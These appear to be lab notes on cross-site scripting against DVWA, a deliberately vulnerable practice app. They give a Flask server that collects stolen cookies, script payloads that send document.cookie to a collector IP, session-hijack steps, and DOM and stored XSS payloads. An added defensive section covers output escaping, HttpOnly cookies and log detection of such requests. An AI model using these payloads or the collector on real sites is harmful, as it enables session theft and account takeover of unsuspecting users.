1. On the receiving (attacker) machine, write a small Flask web application in Python to collect the cookies:

```python
from flask import Flask, request, Response

app = Flask(__name__)

# 1x1 transparent GIF, returned so the request looks like an ordinary image load.
TRANSPARENT_GIF = b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;'


@app.route('/')
def save_cookie():
    # The cookie arrives in the "cookie" query parameter and is appended to a file.
    cookie = request.args.get('cookie', '')
    if cookie:
        with open('/root/cookies.txt', 'a') as f:
            f.write(f"{cookie}\n")
    # Return the 1x1 transparent GIF (so the user does not notice anything)
    return Response(TRANSPARENT_GIF, mimetype='image/gif')


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```
2. Run the XSS test on the DVWA target machine (3 methods):

```html
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>
```
3. In the captured cookie string, the part after the last equals sign is the cookie value. Open Firefox, press F12, open the Storage tab, and replace the cookie value there with the captured one; the page then opens directly without an account or password.
DOM-based XSS in DVWA (edit the `default=` parameter at the end of the XSS (DOM) page URL to get the cookie):

```text
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>
```
Stored XSS in DVWA (first press F12 and increase the maximum length of the name field):

Enter in the name field:

```html
<script>alert(document.cookie);</script>
```

Enter anything in the message field, e.g. `Payload`.

From then on, the cookie pops up every time this stored XSS page is opened.
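The defensive counterpart to the lab above, as an added example that is not part of the original notes: output-encode the reflected parameter (the DVWA name field), issue the session cookie with HttpOnly so `document.cookie` cannot read PHPSESSID (which is what the session reuse in step 3 depends on), and flag the exfiltration pattern in web access or proxy logs. Function names and the log lines are constructed for the example; only the Python standard library is used.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit


def render_greeting_vulnerable(name: str) -> str:
    # Mirrors DVWA's reflected XSS: the parameter is concatenated into HTML unchanged.
    return f"<pre>Hello {name}</pre>"


def render_greeting_hardened(name: str) -> str:
    # html.escape turns < > & " ' into entities, so a <script> tag is shown as text.
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def session_cookie_header(session_id: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie, so the payloads above read nothing.
    # Secure limits it to HTTPS; SameSite=Lax keeps it off cross-site requests.
    return f"Set-Cookie: PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


# Common Log Format prefix: client IP, ident, user, [timestamp], "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')


def find_cookie_exfil(log_lines):
    """Return (client_ip, target) for requests whose query string carries a session
    cookie value or a script tag, the two things the payloads above put into a URL."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        params = parse_qs(urlsplit(target).query)  # percent-decodes the values
        values = [v for vs in params.values() for v in vs]
        if any("PHPSESSID=" in v or "<script" in v.lower() for v in values):
            hits.append((ip, target))
    return hits


# Constructed sample log lines (not real traffic): a cookie hit on the receiver,
# a DOM XSS probe against the DVWA page, and a benign request.
SAMPLE_LOG = [
    '192.168.168.133 - - [01/Jan/2024:10:00:00 +0000] "GET /?cookie=PHPSESSID=abc123;%20security=low HTTP/1.1" 200 43',
    '192.168.168.133 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4096',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(render_greeting_hardened("<script>alert(document.cookie)</script>"))
    print(session_cookie_header("abc123"))
    for ip, target in find_cookie_exfil(SAMPLE_LOG):
        print("suspicious:", ip, target)
```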